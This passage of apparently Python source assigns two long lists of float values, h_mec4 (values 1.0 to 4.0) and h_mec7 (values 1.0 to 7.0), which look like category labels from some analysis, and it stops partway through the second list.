h_mec4 = [3.0, 4.0, 3.0, 1.0, 4.0, 2.0, 2.0, 2.0, 2.0, 2.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 2.0, 2.0, 4.0, 4.0, 3.0, 4.0, 1.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 3.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 2.0, 2.0, 3.0, 2.0, 1.0, 1.0, 4.0, 1.0, 3.0, 1.0, 4.0, 3.0, 1.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 2.0, 2.0, 4.0, 1.0, 2.0, 4.0, 2.0, 1.0, 2.0, 1.0, 4.0, 4.0, 2.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 4.0, 2.0, 2.0, 1.0, 2.0, 3.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 4.0, 4.0, 1.0, 4.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 2.0, 1.0, 1.0, 3.0, 2.0, 3.0, 1.0, 4.0, 1.0, 3.0, 4.0, 4.0, 3.0, 3.0, 1.0, 3.0, 2.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 4.0, 2.0, 1.0, 4.0, 2.0, 2.0, 1.0, 1.0, 4.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 2.0, 3.0, 4.0, 1.0, 1.0, 3.0, 2.0, 4.0, 4.0, 3.0, 1.0, 2.0, 2.0, 1.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 4.0, 4.0, 3.0, 3.0, 2.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 4.0, 2.0, 3.0, 3.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 4.0, 3.0, 4.0, 2.0, 2.0, 1.0, 3.0, 4.0, 4.0, 2.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 4.0, 2.0, 1.0, 3.0, 4.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 3.0, 2.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 2.0, 4.0, 
1.0, 3.0, 1.0, 2.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 2.0, 4.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 2.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 2.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 4.0, 1.0, 1.0, 2.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 2.0, 3.0, 2.0, 4.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 4.0, 2.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 1.0, 4.0, 2.0, 1.0, 2.0, 3.0, 4.0, 2.0, 2.0, 1.0, 3.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 1.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 4.0, 4.0, 3.0, 2.0, 3.0, 2.0, 2.0, 2.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 3.0, 2.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 2.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 4.0, 2.0, 4.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 1.0, 4.0, 2.0, 1.0, 2.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 4.0, 3.0, 3.0, 4.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 4.0, 2.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 2.0, 4.0, 3.0, 4.0, 2.0, 2.0, 4.0, 4.0, 3.0, 1.0, 2.0, 3.0, 4.0, 2.0, 1.0, 4.0, 2.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 
1.0, 1.0, 2.0, 3.0, 4.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 4.0, 3.0, 2.0, 2.0, 2.0, 3.0, 4.0, 4.0, 2.0, 3.0, 2.0, 1.0, 1.0, 1.0, 4.0, 1.0, 4.0, 2.0, 1.0, 4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 2.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 3.0, 1.0, 2.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 2.0, 3.0, 3.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 3.0, 2.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 4.0, 3.0, 4.0, 4.0, 4.0, 3.0, 2.0, 3.0, 4.0, 4.0, 2.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 4.0, 2.0, 2.0, 1.0, 2.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 4.0, 1.0, 1.0, 3.0, 1.0, 4.0, 2.0, 1.0, 3.0, 2.0, 2.0, 1.0, 2.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 4.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 3.0, 2.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 4.0, 3.0, 4.0, 4.0, 4.0, 3.0, 2.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 2.0, 1.0, 3.0, 2.0, 1.0, 4.0, 1.0, 3.0, 2.0, 1.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 2.0, 1.0, 3.0, 4.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 3.0, 4.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 1.0, 1.0, 3.0, 4.0, 3.0, 3.0, 4.0, 3.0, 4.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 4.0, 1.0, 1.0, 2.0, 1.0, 1.0, 3.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 3.0, 4.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 4.0, 1.0, 4.0, 1.0, 1.0, 4.0, 1.0, 3.0, 2.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 2.0, 2.0, 4.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 4.0, 2.0, 4.0, 4.0, 1.0, 2.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 2.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 2.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 4.0, 2.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 2.0, 4.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 
4.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 4.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 3.0, 4.0, 4.0, 3.0, 2.0, 4.0, 3.0, 2.0, 4.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 1.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 4.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 2.0, 2.0, 3.0, 3.0, 2.0, 2.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 1.0, 2.0, 4.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 1.0, 4.0, 3.0, 3.0, 3.0, 3.0, 4.0, 2.0, 2.0, 3.0, 4.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 2.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 3.0, 2.0, 4.0, 3.0, 1.0, 4.0, 4.0, 2.0, 2.0, 1.0, 1.0, 3.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 3.0, 3.0, 2.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 2.0, 3.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 3.0, 4.0, 3.0, 2.0, 4.0, 1.0, 1.0, 4.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 3.0, 3.0, 4.0, 1.0, 4.0, 1.0, 2.0, 3.0, 4.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 2.0, 1.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 4.0, 3.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 1.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 3.0, 2.0, 4.0, 3.0, 2.0, 4.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 3.0, 1.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 2.0, 4.0, 4.0, 3.0, 3.0, 2.0, 2.0, 2.0, 1.0, 2.0, 3.0, 4.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 2.0, 1.0, 2.0, 2.0, 2.0, 3.0, 3.0, 2.0, 4.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 3.0, 2.0, 1.0, 4.0, 2.0, 3.0, 2.0, 1.0, 3.0, 1.0, 2.0, 2.0, 1.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 
1.0, 2.0, 3.0, 1.0, 4.0, 1.0, 1.0, 2.0, 3.0, 4.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 3.0, 2.0, 4.0, 2.0, 3.0, 3.0, 3.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 4.0, 2.0, 3.0, 1.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 2.0, 3.0, 4.0, 4.0, 1.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 2.0, 2.0, 2.0, 1.0, 3.0, 3.0, 4.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 4.0, 2.0, 2.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 2.0, 3.0, 1.0, 4.0, 3.0, 3.0, 3.0, 3.0, 2.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 2.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 1.0, 1.0, 3.0, 2.0, 1.0, 4.0, 4.0, 1.0, 2.0, 4.0, 4.0, 3.0, 1.0, 4.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 3.0, 3.0, 1.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 3.0, 1.0, 2.0, 3.0, 3.0, 4.0, 4.0, 2.0, 3.0, 2.0, 4.0, 3.0, 1.0, 4.0, 1.0, 3.0, 2.0, 1.0, 3.0, 4.0, 2.0, 3.0, 4.0, 4.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 1.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 3.0, 2.0, 2.0, 1.0, 3.0, 1.0, 1.0, 1.0, 1.0, 2.0, 2.0, 2.0, 1.0, 1.0, 2.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 4.0, 3.0, 3.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 4.0, 4.0, 3.0, 1.0, 4.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 3.0, 3.0, 1.0, 3.0, 3.0, 3.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 2.0, 1.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 2.0, 1.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 1.0, 3.0, 2.0, 1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 3.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 1.0, 1.0, 2.0, 2.0, 3.0, 1.0, 1.0, 2.0, 1.0, 1.0, 2.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 3.0, 1.0, 1.0, 3.0, 3.0, 4.0, 4.0, 1.0, 4.0, 4.0, 3.0, 4.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 3.0, 3.0, 2.0, 3.0, 4.0, 1.0, 3.0, 4.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 4.0, 3.0, 2.0, 1.0, 3.0, 4.0, 1.0, 1.0, 3.0, 2.0, 2.0, 1.0, 4.0, 1.0, 3.0, 1.0, 3.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 1.0, 3.0, 4.0, 2.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 3.0, 3.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 1.0, 2.0, 1.0, 3.0, 4.0, 4.0, 3.0, 3.0, 4.0, 4.0, 1.0, 3.0, 2.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 3.0, 3.0, 1.0, 1.0, 4.0, 4.0, 1.0, 2.0, 1.0, 3.0, 1.0, 1.0, 2.0, 3.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 3.0, 3.0, 4.0, 1.0, 3.0, 3.0, 3.0, 3.0, 4.0, 2.0, 1.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 3.0, 1.0, 4.0, 2.0, 3.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 2.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 1.0, 3.0, 1.0, 4.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 2.0, 2.0, 4.0, 1.0, 3.0, 3.0, 4.0, 1.0, 1.0, 2.0, 3.0, 3.0, 1.0, 1.0, 3.0, 4.0, 1.0, 2.0, 4.0, 4.0, 3.0, 2.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 4.0, 2.0, 1.0, 1.0, 1.0, 3.0, 2.0, 3.0, 3.0, 1.0, 3.0, 2.0, 3.0, 4.0, 4.0, 3.0, 2.0, 1.0, 3.0, 3.0, 2.0, 1.0, 2.0, 1.0, 2.0, 2.0, 3.0, 3.0, 3.0, 1.0, 2.0, 2.0, 3.0, 3.0, 1.0, 1.0, 1.0, 2.0, 3.0, 4.0, 2.0, 4.0, 4.0, 1.0, 4.0, 3.0, 1.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 4.0, 1.0, 4.0, 1.0, 4.0, 1.0, 1.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 3.0, 4.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 1.0, 2.0, 4.0, 1.0, 1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 2.0, 1.0, 2.0, 1.0, 3.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 3.0, 2.0, 4.0, 1.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 2.0, 3.0, 3.0, 3.0, 4.0, 3.0, 1.0, 1.0, 3.0, 1.0, 2.0, 4.0, 4.0, 1.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0, 4.0, 2.0, 1.0, 2.0, 3.0, 1.0, 2.0, 4.0, 1.0, 3.0, 3.0, 1.0, 
3.0, 2.0, 4.0, 3.0, 4.0, 4.0, 1.0, 1.0, 1.0, 3.0, 2.0, 4.0, 1.0, 4.0, 3.0, 4.0, 3.0, 3.0, 3.0, 1.0, 1.0, 1.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 2.0, 3.0, 1.0, 4.0, 3.0, 2.0, 2.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 1.0, 4.0, 1.0, 3.0, 1.0, 4.0, 2.0, 2.0, 1.0, 4.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 4.0, 1.0, 3.0, 1.0, 3.0, 1.0, 3.0, 4.0, 1.0, 4.0, 1.0, 3.0, 3.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 1.0, 1.0, 2.0, 1.0, 4.0, 1.0, 4.0, 3.0, 3.0, 1.0, 2.0, 1.0, 4.0, 4.0, 4.0, 1.0, 3.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 3.0, 3.0, 3.0, 4.0, 2.0, 2.0, 3.0, 2.0, 3.0, 1.0, 1.0, 2.0, 1.0, 2.0, 1.0, 1.0, 1.0, 3.0, 3.0, 3.0, 2.0, 3.0, 1.0, 1.0, 4.0, 3.0, 1.0, 4.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 3.0, 1.0, 1.0, 2.0, 2.0, 3.0, 3.0, 4.0, 3.0, 3.0, 4.0, 1.0, 4.0, 4.0, 1.0, 3.0, 3.0, 3.0, 3.0, 1.0, 2.0, 1.0, 1.0, 4.0, 2.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 2.0, 1.0, 3.0, 2.0, 3.0, 3.0, 4.0, 4.0, 2.0, 3.0, 3.0, 4.0]
h_mec7 = [6.0, 6.0, 6.0, 4.0, 6.0, 3.0, 2.0, 6.0, 7.0, 1.0, 7.0, 1.0, 1.0, 3.0, 4.0, 4.0, 4.0, 3.0, 5.0, 4.0, 7.0, 3.0, 6.0, 7.0, 7.0, 4.0, 1.0, 3.0, 6.0, 1.0, 4.0, 4.0, 7.0, 3.0, 1.0, 4.0, 4.0, 6.0, 2.0, 6.0, 1.0, 1.0, 2.0, 4.0, 3.0, 3.0, 5.0, 5.0, 2.0, 3.0, 7.0, 3.0, 3.0, 6.0, 4.0, 6.0, 4.0, 1.0, 3.0, 6.0, 7.0, 4.0, 7.0, 2.0, 4.0, 3.0, 3.0, 3.0, 3.0, 1.0, 1.0, 7.0, 7.0, 1.0, 2.0, 1.0, 4.0, 4.0, 7.0, 4.0, 3.0, 3.0, 4.0, 3.0, 4.0, 5.0, 2.0, 5.0, 1.0, 3.0, 4.0, 6.0, 6.0, 4.0, 1.0, 4.0, 6.0, 1.0, 4.0, 6.0, 3.0, 6.0, 3.0, 6.0, 2.0, 6.0, 6.0, 1.0, 4.0, 6.0, 2.0, 3.0, 4.0, 1.0, 2.0, 7.0, 5.0, 7.0, 4.0, 6.0, 6.0, 5.0, 1.0, 6.0, 1.0, 6.0, 4.0, 6.0, 1.0, 4.0, 4.0, 2.0, 6.0, 4.0, 3.0, 3.0, 1.0, 6.0, 7.0, 1.0, 2.0, 6.0, 3.0, 6.0, 6.0, 6.0, 2.0, 5.0, 3.0, 4.0, 1.0, 6.0, 1.0, 3.0, 1.0, 7.0, 7.0, 2.0, 2.0, 4.0, 7.0, 4.0, 6.0, 4.0, 1.0, 4.0, 2.0, 6.0, 2.0, 6.0, 6.0, 4.0, 7.0, 1.0, 4.0, 1.0, 2.0, 4.0, 6.0, 4.0, 1.0, 4.0, 3.0, 6.0, 6.0, 1.0, 3.0, 2.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 3.0, 6.0, 1.0, 1.0, 2.0, 1.0, 6.0, 1.0, 3.0, 1.0, 1.0, 6.0, 1.0, 6.0, 5.0, 6.0, 3.0, 2.0, 1.0, 2.0, 6.0, 2.0, 4.0, 2.0, 2.0, 4.0, 7.0, 1.0, 1.0, 6.0, 4.0, 6.0, 4.0, 2.0, 4.0, 2.0, 3.0, 1.0, 4.0, 1.0, 2.0, 3.0, 3.0, 4.0, 3.0, 6.0, 2.0, 1.0, 2.0, 1.0, 4.0, 1.0, 6.0, 5.0, 6.0, 1.0, 3.0, 1.0, 1.0, 2.0, 6.0, 2.0, 7.0, 4.0, 2.0, 3.0, 4.0, 1.0, 3.0, 1.0, 1.0, 3.0, 3.0, 1.0, 1.0, 4.0, 6.0, 5.0, 5.0, 2.0, 3.0, 3.0, 4.0, 2.0, 7.0, 4.0, 4.0, 5.0, 3.0, 7.0, 2.0, 6.0, 2.0, 2.0, 1.0, 7.0, 4.0, 4.0, 2.0, 5.0, 3.0, 1.0, 3.0, 6.0, 1.0, 5.0, 4.0, 4.0, 2.0, 3.0, 5.0, 6.0, 4.0, 2.0, 1.0, 3.0, 6.0, 6.0, 1.0, 7.0, 2.0, 3.0, 1.0, 1.0, 4.0, 1.0, 6.0, 2.0, 4.0, 1.0, 4.0, 6.0, 1.0, 4.0, 6.0, 1.0, 1.0, 6.0, 1.0, 4.0, 1.0, 2.0, 6.0, 4.0, 1.0, 7.0, 7.0, 7.0, 1.0, 3.0, 4.0, 6.0, 1.0, 3.0, 1.0, 3.0, 6.0, 4.0, 6.0, 4.0, 1.0, 7.0, 1.0, 3.0, 4.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 5.0, 1.0, 4.0, 4.0, 6.0, 4.0, 5.0, 6.0, 2.0, 1.0, 4.0, 1.0, 7.0, 2.0, 7.0, 2.0, 1.0, 4.0, 4.0, 2.0, 1.0, 6.0, 4.0, 1.0, 1.0, 6.0, 6.0, 3.0, 1.0, 7.0, 